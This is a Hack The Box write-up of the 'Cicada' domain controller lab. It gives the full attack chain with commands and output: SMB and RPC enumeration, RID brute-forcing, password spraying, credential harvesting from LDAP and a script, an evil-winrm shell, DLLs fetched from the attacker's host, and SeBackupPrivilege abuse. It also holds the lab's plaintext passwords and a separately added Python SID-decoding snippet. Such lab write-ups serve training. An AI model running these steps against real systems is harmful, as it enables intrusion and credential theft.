HTB: Cicada Writeup

Writeup for Hack The Box: Cicada.

Because my enumeration was incomplete, I could not achieve initial access on my own. Privilege escalation, on the other hand, was straightforward.

Below are the nmap scan results.

└─$ nmap -Pn -A $RHOST -oG general-portscan.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 09:19 EDT
Nmap scan report for 10.129.231.149
Host is up (0.48s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-08 20:19:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-08T20:21:06
|_  start_date: N/A
|_clock-skew: 6h59m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   532.93 ms 10.10.16.1
2   533.72 ms 10.129.231.149

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.73 seconds

The target machine appears to be a domain controller.

I found the following SMB shares.

└─$ smbclient -L $RHOST
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        DEV             Disk      
        HR              Disk      
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.231.149 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The DEV and HR shares caught my eye.

I could not look inside the DEV share for lack of permissions, but the HR share was accessible.

└─$ smbclient //$RHOST/HR
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 08:29:09 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024

I found a file named Notice from HR.txt, so I downloaded it.

smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
smb: \> 

Below are the contents of Notice from HR.txt.

└─$ cat Notice\ from\ HR.txt 

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

It was a notice for new hires on how to set their password. The default password turned out to be Cicada$M6Corpb*@Lp#nZp!8. However, no username was given.

After a round of enumeration, I managed to obtain some usernames with rpcclient.

First, connect to the target's MS-RPC service without authentication.

└─$ rpcclient -U "" $RHOST
Password for [WORKGROUP\]:

Get the domain SID with the lsaquery command.

rpcclient $> lsaquery
Domain Name: CICADA
Domain Sid: S-1-5-21-917908876-1423158569-3159038727
rpcclient $> 

Enumerate SIDs with the lsaenumsid command, passing the SID above.

rpcclient $> lsaenumsid S-1-5-21-917908876-1423158569-3159038727
found 20 SIDs

S-1-5-90-0
S-1-5-9
S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
S-1-5-80-0
S-1-5-6
S-1-5-32-559
S-1-5-32-554
S-1-5-32-551
S-1-5-32-550
S-1-5-32-549
S-1-5-32-548
S-1-5-32-545
S-1-5-32-544
S-1-5-21-917908876-1423158569-3159038727-1601
S-1-5-21-917908876-1423158569-3159038727-1109
S-1-5-20
S-1-5-19
S-1-5-18
S-1-5-11
S-1-1-0

The following three SIDs caught my eye.

S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
S-1-5-21-917908876-1423158569-3159038727-1601
S-1-5-21-917908876-1423158569-3159038727-1109

Looking up the above SIDs with the lookupsids command revealed the names NT SERVICE\WdiServiceHost, CICADA\emily.oscars, and CICADA\Dev Support.

rpcclient $> lookupsids S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420
S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420 NT SERVICE\WdiServiceHost (5)

rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-1601
S-1-5-21-917908876-1423158569-3159038727-1601 CICADA\emily.oscars (1)

rpcclient $> lookupsids S-1-5-21-917908876-1423158569-3159038727-1109
S-1-5-21-917908876-1423158569-3159038727-1109 CICADA\Dev Support (2)

I tried to look up each account's details with the queryuser command, but I lacked the permissions, so no details were obtained.

rpcclient $> queryuser WdiServiceHost
result was NT_STATUS_ACCESS_DENIED

rpcclient $> queryuser emily.oscars
result was NT_STATUS_ACCESS_DENIED

rpcclient $> queryuser 'Dev Support'
result was NT_STATUS_ACCESS_DENIED

None of the discovered names appeared to use the password Cicada$M6Corpb*@Lp#nZp!8, so they could not be used for initial access.

I got stuck around here, so I looked at the hint. The hint follows.

In this machine, players will enumerate the domain, identify users, navigate shares, uncover plaintext passwords stored in files, execute a password spray

I had tried everything the hint suggests... perhaps my enumeration had gaps.

So I peeked at other writeups, and it turns out that crackmapexec's --rid-brute can retrieve a list of users.

I tried it right away.

crackmapexec smb $RHOST -u 'anonymous' -p '' -d cicada --rid-brute

Usernames other than the CICADA\emily.oscars and CICADA\Dev Support I had found myself appeared.

└─$ crackmapexec smb $RHOST -u 'anonymous' -p '' -d cicada --rid-brute
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [+] cicada\anonymous: 
SMB         10.129.231.149  445    CICADA-DC        [+] Brute forcing RIDs
SMB         10.129.231.149  445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.231.149  445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

Below is the list of domain users identified.

CICADA\Administrator
CICADA\Guest
CICADA\krbtgt
CICADA\CICADA-DC$
CICADA\john.smoulder
CICADA\sarah.dantelia
CICADA\michael.wrightson
CICADA\david.orelious
CICADA\Dev Support
CICADA\emily.oscars

Password spraying the above users revealed that cicada\michael.wrightson was using the default password Cicada$M6Corpb*@Lp#nZp!8. (Dev Support also appears to authenticate successfully, but that is a false positive.)

└─$ crackmapexec smb $RHOST -u users.txt -p pass.txt -d cicada --continue-on-success
SMB         10.129.231.149  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada) (signing:True) (SMBv1:False)
SMB         10.129.231.149  445    CICADA-DC        [-] cicada\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [+] cicada\Dev Support:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [+] cicada\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.231.149  445    CICADA-DC        [-] cicada\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

Sending the following LDAP query with the obtained credentials michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 revealed the password aRt$Lp#7t*VQ!3.

└─$ ldapsearch -H ldap://$RHOST -D 'cicada\michael.wrightson' -w 'Cicada$M6Corpb*@Lp#nZp!8' -b "DC=cicada,DC=htb" | grep -i desc
description: Default container for upgraded user accounts
description: Default container for upgraded computer accounts

-- <snipped> --

description: Just in case I forget my password is aRt$Lp#7t*VQ!3

The password apparently belongs to david.orelious.

└─$ ldapsearch -H ldap://$RHOST -D 'cicada\michael.wrightson' -w 'Cicada$M6Corpb*@Lp#nZp!8' -b "DC=cicada,DC=htb" | grep -C 25 'my password'
pwdLastSet: 133548922493737634
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAjC22Nimt01QHG0u8UgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: michael.wrightson
sAMAccountType: 805306368
userPrincipalName: michael.wrightson@cicada.htb
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cicada,DC=htb
dSCorePropagationData: 20240828172622.0Z
dSCorePropagationData: 20240822173938.0Z
dSCorePropagationData: 20240314181531.0Z
dSCorePropagationData: 20240314172956.0Z
dSCorePropagationData: 16010714224104.0Z
lastLogonTimestamp: 133956702610535158
msDS-SupportedEncryptionTypes: 0

# David Orelious, Users, cicada.htb
dn: CN=David Orelious,CN=Users,DC=cicada,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Orelious
sn: Orelious
description: Just in case I forget my password is aRt$Lp#7t*VQ!3
givenName: David
initials: D
distinguishedName: CN=David Orelious,CN=Users,DC=cicada,DC=htb
instanceType: 4
whenCreated: 20240314121729.0Z
whenChanged: 20240828172557.0Z
uSNCreated: 20569
uSNChanged: 122945
name: David Orelious
objectGUID:: vLT9wKgMqkOmSQuC/2CSVw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 133549578189522494
lastLogoff: 0
lastLogon: 133549579419992639
pwdLastSet: 133548922495138483
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAjC22Nimt01QHG0u8VAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: david.orelious
sAMAccountType: 805306368
userPrincipalName: david.orelious@cicada.htb
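As an added example (not part of the original writeup), the following Python decodes the base64 objectSid values that ldapsearch prints above into textual SIDs and resolves their RIDs against the --rid-brute output shown earlier. The sample inputs are constructed from the output on this page; it also shows why the Dev Support "success" in the spray is a false positive: RID 1109 is a group (SidTypeGroup), not a user account.

```python
import base64
import re
import struct

# Constructed sample: two objectSid attributes exactly as ldapsearch prints
# them (base64 after "::"), taken from the LDAP output on this page.
LDAP_SAMPLE = """sAMAccountName: michael.wrightson
objectSid:: AQUAAAAAAAUVAAAAjC22Nimt01QHG0u8UgQAAA==
sAMAccountName: david.orelious
objectSid:: AQUAAAAAAAUVAAAAjC22Nimt01QHG0u8VAQAAA==
"""

# Constructed sample: a few lines in crackmapexec --rid-brute format.
RID_BRUTE_SAMPLE = r"""SMB         10.129.231.149  445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.231.149  445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.231.149  445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
"""


def decode_sid(blob: bytes) -> str:
    """Convert a binary SID (the objectSid wire format) to S-1-... text."""
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")          # 48-bit, big-endian
    subs = struct.unpack("<%dI" % count, blob[8:8 + 4 * count])  # 32-bit LE each
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def sids_from_ldap(text: str) -> dict:
    """Return {sAMAccountName: SID text} from ldapsearch output."""
    out, current = {}, None
    for line in text.splitlines():
        if line.startswith("sAMAccountName: "):
            current = line.split(": ", 1)[1]
        elif line.startswith("objectSid:: ") and current:
            out[current] = decode_sid(base64.b64decode(line.split(":: ", 1)[1]))
    return out


RID_LINE = re.compile(r"(\d+): (\S+\\.+?) \((SidType\w+)\)\s*$")


def parse_rid_brute(text: str) -> dict:
    """Return {rid: (DOMAIN\\name, SidType...)} from --rid-brute output."""
    out = {}
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            out[int(m.group(1))] = (m.group(2), m.group(3))
    return out


def domain_of(sid: str) -> str:
    """Domain SID = everything before the last sub-authority (the RID)."""
    return sid.rsplit("-", 1)[0]


def rid_of(sid: str) -> int:
    return int(sid.rsplit("-", 1)[1])


def user_principals(rid_map: dict) -> list:
    """Only SidTypeUser entries are logon accounts; groups cannot authenticate."""
    return [name for _, (name, kind) in sorted(rid_map.items()) if kind == "SidTypeUser"]


if __name__ == "__main__":
    rids = parse_rid_brute(RID_BRUTE_SAMPLE)
    for account, sid in sids_from_ldap(LDAP_SAMPLE).items():
        print(account, sid, rids.get(rid_of(sid)))
```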

With the obtained credentials david.orelious:aRt$Lp#7t*VQ!3, I could access the DEV share found at the start.

└─$ smbclient //$RHOST/DEV -U 'david.orelious'
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 08:31:39 2024
  ..                                  D        0  Thu Mar 14 08:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 13:28:22 2024

                4168447 blocks of size 4096. 478357 blocks available

I found a file named Backup_script.ps1, so I downloaded it.

smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> 

Below are the contents of Backup_script.ps1.

└─$ cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

It appears to be a script for backing up the contents of the C:\smb folder. The username emily.oscars and the password Q!3@Lp#M6b*7t*Vt were hardcoded right in it.

With the obtained credentials emily.oscars:Q!3@Lp#M6b*7t*Vt, I could connect to the target machine over WinRM.

└─$ evil-winrm -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -i $RHOST
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> hostname
CICADA-DC

Obtained the user flag C:\Users\emily.oscars.CICADA\desktop\user.txt.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir C:\Users\emily.oscars.CICADA\desktop


    Directory: C:\Users\emily.oscars.CICADA\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         6/22/2025   1:34 PM             34 user.txt


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type C:\Users\emily.oscars.CICADA\desktop\user.txt
7e8e0c36e23a080757b3453e<REDACTED>

Next, privilege escalation.

Enumeration located the root flag C:\Users\Administrator\Desktop\root.txt.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> Get-ChildItem -Path C:\Users\ -Include *.ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.zip,*.xml -File -Recurse -ErrorAction SilentlyContinue


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         6/22/2025   1:34 PM             34 root.txt


    Directory: C:\Users\emily.oscars.CICADA\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         6/22/2025   1:34 PM             34 user.txt

But, naturally, there is no read permission.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> type C:\Users\Administrator\Desktop\root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type C:\Users\Administrator\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand

Continuing enumeration revealed that the user emily.oscars holds the SeBackupPrivilege and SeRestorePrivilege privileges.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Furthermore, the user was a member of BUILTIN\Backup Operators.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Abusing these backup privileges gives access to files and directories the user normally cannot read (in this case C:\Users\Administrator\Desktop\root.txt).

First, plant SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll on the target machine.

iwr -uri http://10.10.16.174/SeBackupPrivilegeCmdLets.dll -Outfile SeBackupPrivilegeCmdLets.dll
iwr -uri http://10.10.16.174/SeBackupPrivilegeUtils.dll -Outfile SeBackupPrivilegeUtils.dll

Import the planted DLLs.

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Enable SeBackupPrivilege.

Set-SeBackupPrivilege

Copy the root flag C:\Users\Administrator\Desktop\root.txt to C:\Users\emily.oscars.CICADA\gotcha.txt with Copy-FileSeBackupPrivilege.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt C:\Users\emily.oscars.CICADA\gotcha.txt -Overwrite
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> dir


    Directory: C:\Users\emily.oscars.CICADA


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         8/28/2024  10:32 AM                Desktop
d-r---         8/22/2024   2:22 PM                Documents
d-r---          5/8/2021   1:20 AM                Downloads
d-r---          5/8/2021   1:20 AM                Favorites
d-r---          5/8/2021   1:20 AM                Links
d-r---          5/8/2021   1:20 AM                Music
d-r---          5/8/2021   1:20 AM                Pictures
d-----          5/8/2021   1:20 AM                Saved Games
d-r---          5/8/2021   1:20 AM                Videos
-a----         6/22/2025   2:50 PM             34 gotcha.txt
-a----         6/22/2025   2:47 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----         6/22/2025   2:47 PM          16384 SeBackupPrivilegeUtils.dll

Open C:\Users\emily.oscars.CICADA\gotcha.txt to obtain the root flag.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> type C:\Users\emily.oscars.CICADA\gotcha.txt
eb963e552d68169d68a48825<REDACTED>
